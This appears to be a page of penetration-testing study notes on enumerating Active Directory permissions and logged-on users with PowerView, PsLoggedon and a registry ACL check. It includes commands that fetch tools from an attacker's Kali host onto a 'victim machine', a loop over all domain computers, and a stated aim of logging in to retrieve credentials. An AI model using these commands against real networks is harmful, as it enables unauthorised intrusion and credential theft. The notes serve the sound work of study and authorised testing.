Enumerate permissions and logged-on users

Short notes:

Why was the PowerView Get-NetSession command giving us an "Access denied" error?
The error occurred because the NetSessionEnum API requires specific permissions to enumerate sessions, and the user did not have sufficient privileges to access this information remotely on the targeted machines.
How did we check for the required permissions?
We checked the permissions using the PowerShell Get-Acl cmdlet, which retrieved and displayed the access permissions for the relevant registry hive.

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl

Which registry key is responsible for controlling the permissions?
The responsible key is the SrvsvcSessionInfo registry key, located under: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity.

# This is custom made folder. Things have been downloaded from official microsoft page. 
locate -i psloggedon
python3 -m http.server 80 -d /usr/share/pstools/
iwr -uri http://$KaliIP/<fileName> -Outfile <fileName>

# PowerView command used to scan the domain to identify computers where the current user has local administrative privileges.
Find-LocalAdminAccess

# Identifying logged-in users on a machine using the NetWkstaUserEnum and NetSessionEnum APIs.
# Example usage:
Get-NetSession -ComputerName files04 -Verbose
Get-NetSession -ComputerName web04 -Verbose
Get-NetSession -ComputerName client74 -Verbose

# Note: If you encounter an "Access Denied" error, this likely indicates insufficient privileges to run the query. 
# The specific error message may provide additional context regarding the required permissions.

# It may be more effective to use other tools than Get-NetSession.
# For instance, try using psloggedon.exe for enumeration.
# Download and add it as needed.
.\PsLoggedon.exe \\files04
.\PsLoggedon.exe \\client74
.\PsLoggedon.exe \\web04

# Important: If PsLoggedon does not display any logged-in users, this might indicate that the Remote Registry service is not running, 
# which is a requirement for PsLoggedon to function properly.

# If we identify any user with login capability, we can attempt to log into the machine and retrieve credentials. RDP may also be an option.

First, upload PsLoggedon.exe to the victim machine and then run the below command.

# Search for a user who is currently logged in to all Computer present in the domain
Get-NetComputer | ForEach-Object { Write-Output "Checking logons for computer: $($_.cn)"; ./PsLoggedon.exe "\\$($_.cn)" -accepteula; Write-Output "`n---------------------------`n" } ; Write-Output "`nBelow are host on which current user is local Admin`n"; Find-LocalAdminAccess

# PowerView Commnad:
# finds domain machines where specific users are logged into
Find-DomainUserLocation

PreviousEnumerate Operating Systems NextEnumerate through Service Principal Names

Last updated 1 year ago